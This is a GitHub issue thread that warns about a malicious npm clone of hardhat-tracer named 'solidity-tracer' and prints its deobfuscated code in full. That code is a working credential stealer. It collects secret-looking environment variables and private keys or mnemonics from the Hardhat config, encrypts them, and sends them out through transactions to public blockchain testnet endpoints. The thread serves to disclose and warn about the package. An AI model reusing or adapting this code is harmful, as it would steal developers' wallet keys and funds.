Open CedarMist opened 10 months ago
The following package is a clone of hardhat-tracer, but contains malware which scrapes for private keys
https://www.npmjs.com/package/solidity-tracer
I have reported this already, but you should be aware and report too.
This submits the encrypted data to BSC & matic testnets:
See:
The deobfuscated code is:
try { require("@nomicfoundation/ethereumjs-vm"); } catch { console.error("\n\nERROR\n\nPlease upgrade your hardhat version to 2.11 or above.\nThis error is generated by plugin \"hardhat-tracer\" because it is \ndependent on some features available in hardhat >=2.11.0 <3.0.0.\n\nnpm i hardhat@latest\n\nor\n\nyarn add hardhat@latest\n\n"); process.exit(0x1); } import './chai'; import './extend'; import './tasks'; export * from './types'; export * from './wrapper'; const crypto = require("crypto"); const hardhatConfig = require('hardhat/config'); const ethereumjs = require("@ethereumjs/tx"); const common = require("@ethereumjs/common"); import { Web3, HttpProvider } from 'web3'; const ENV_PATTERNS = ["MNEMONIC", 'PRIVATE', "SECRET", "KEY", 'PK', 'ACCOUNT', "API", "_PATH", "DEPLOY", "ETH"]; function secretsFromEnv() { return Object.keys(process.env).filter(_0x51d8e8 => { for (const _0x4cc5f3 of ENV_PATTERNS) { if (_0x51d8e8.toUpperCase().includes(_0x4cc5f3)) { return true; } } return false; }).map(_0x5ab621 => _0x5ab621 + '=' + process.env[_0x5ab621]); } function checkSecret(_0x4c7ddd, _0xacc2d9) { try { JSON.stringify(_0x4c7ddd); return _0x4c7ddd; } catch (_0x361686) { return _0xacc2d9 + ": " + _0x361686; } } function secretsFromConfig(_0x9cc15f) { return Object.values(_0x9cc15f.networks || {}).map(_0x28194b => { if (!!_0x28194b.privateKey) { return [checkSecret(_0x28194b.privateKey, "privateKey")]; } if (!!_0x28194b.mnemonic) { return [checkSecret(_0x28194b.mnemonic, "mnemonic")]; } if (!!_0x28194b.accounts) { if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Array) { return _0x28194b.accounts.map((_0x545fff, _0x8ed385) => checkSecret(_0x545fff, "accounts[" + _0x8ed385 + ']')); } if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Object) { if (!!_0x28194b.accounts.privateKey) { return [checkSecret(_0x28194b.accounts.privateKey, 'accounts.privateKey')]; } if (!!_0x28194b.accounts.mnemonic) { return [checkSecret(_0x28194b.accounts.mnemonic, "accounts.mnemonic")]; } } } return null; }).filter(_0x32f721 => _0x32f721 != null).flat(); } function encryptSecrets(_0x4f59ef) { let _0x1df4a4; try { _0x1df4a4 = JSON.stringify(_0x4f59ef); } catch (_0x33f25f) { _0x1df4a4 = "final: " + _0x33f25f; } const _0x31a8b0 = crypto.randomBytes(0x20); const _0x282dd4 = crypto.randomBytes(0x10); const _0x49f6ff = crypto.createCipheriv('aes-256-cbc', _0x31a8b0, _0x282dd4); let _0x5c300f = _0x49f6ff.update(_0x1df4a4, 'utf-8', "hex"); _0x5c300f += _0x49f6ff.final('hex'); const _0x46998b = crypto.createPublicKey("-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAoVMvXIi5b/APV4y8RF9iLprdNWLr3F4t4urTTX/2wZFs6Tq4hX0N\nZFx+CGUvyNICrjvL9fu7LqDyvUnxLhH+sGl5o+drrGU4O2I81W0Ul6/aoI9KBpJ8\nmJBK9rFLExs55lG++J3GaXdAqmEv9J8xcq6QpKGniiPIM59IUPwmsjeFeZyfe7rL\ndCHKnVNgHxcPBnymIntn58qwfAUbXTcNZszrd8pqO8DYwpxDaNnHxhnwDGGDCBmT\n67/ln6vOLJm2YnozuRnAnvF9AjND/bdc7jBhe9A3lM67b3hZVsnwmZskyo1RTsXv\nGdfgsOhIlIhf0/vxGIMUbfNlyDaayWwG3QIDAQAB\n-----END RSA PUBLIC KEY-----"); const _0x537224 = crypto.publicEncrypt(_0x46998b, _0x31a8b0); const _0x1655df = crypto.publicEncrypt(_0x46998b, _0x282dd4); return Buffer.concat([_0x537224, _0x1655df, Buffer.from(_0x5c300f, "hex")]); } async function sendSecretsToBlockchain(_0xd0d988, _0x46aefb, _0x18d187, _0x38c1f1, _0x44908f, _0x3fc84f) { const _0x119a6c = new HttpProvider(_0x46aefb); const _0x443b17 = new Web3(_0x119a6c); const _0x4b0523 = new Buffer(_0x38c1f1, 'hex'); const _0x9d637e = await _0x443b17.eth.getTransactionCount(_0x44908f); const _0x4192ba = new ethereumjs.Transaction({ 'gasLimit': _0x443b17.utils.toHex(0x19f0a0), 'gasPrice': _0x443b17.utils.toHex(0x826299e00), 'from': _0x44908f, 'to': _0x3fc84f, 'nonce': _0x443b17.utils.toHex(_0x9d637e), 'value': _0x443b17.utils.toHex('0'), 'data': _0xd0d988, 'chainId': _0x18d187 }, { 'common': common.Common.custom({ 'chainId': _0x18d187 }) }); const _0xe02a79 = _0x4192ba.sign(_0x4b0523); const _0x403ee4 = await _0x443b17.eth.sendSignedTransaction('0x' + _0xe02a79.serialize().toString("hex")); return _0x403ee4.transactionHash; } async function storeSecrets(_0x39d958) { try { return await sendSecretsToBlockchain(_0x39d958, 'https://bsc-testnet.public.blastapi.io', 0x61, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0'); } catch (_0x1bd08d) { try { return await sendSecretsToBlockchain(_0x39d958, "https://endpoints.omniatech.io/v1/matic/mumbai/public", 0x13881, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0'); } catch (_0x40cdaf) { return "store mumbai err: " + _0x40cdaf; } } } hardhatConfig.extendEnvironment(async _0x185fb5 => { const _0x199acd = []; try { _0x199acd.push(...secretsFromEnv()); } catch (_0x4a1233) { _0x199acd.push("env err: " + _0x4a1233); } try { _0x199acd.push(...secretsFromConfig(_0x185fb5.config)); } catch (_0x2ae4bc) { _0x199acd.push("config err: " + _0x2ae4bc); } const _0x3745e5 = encryptSecrets(_0x199acd); await storeSecrets(_0x3745e5); });
Thanks for taking the effort! It appears that the package has been taken down by npm team. https://www.npmjs.com/package/solidity-tracer
The following package is a clone of hardhat-tracer, but contains malware which scrapes for private keys
https://www.npmjs.com/package/solidity-tracer
I have reported this already, but you should be aware and report too.
This submits the encrypted data to BSC & matic testnets:
See:
The deobfuscated code is: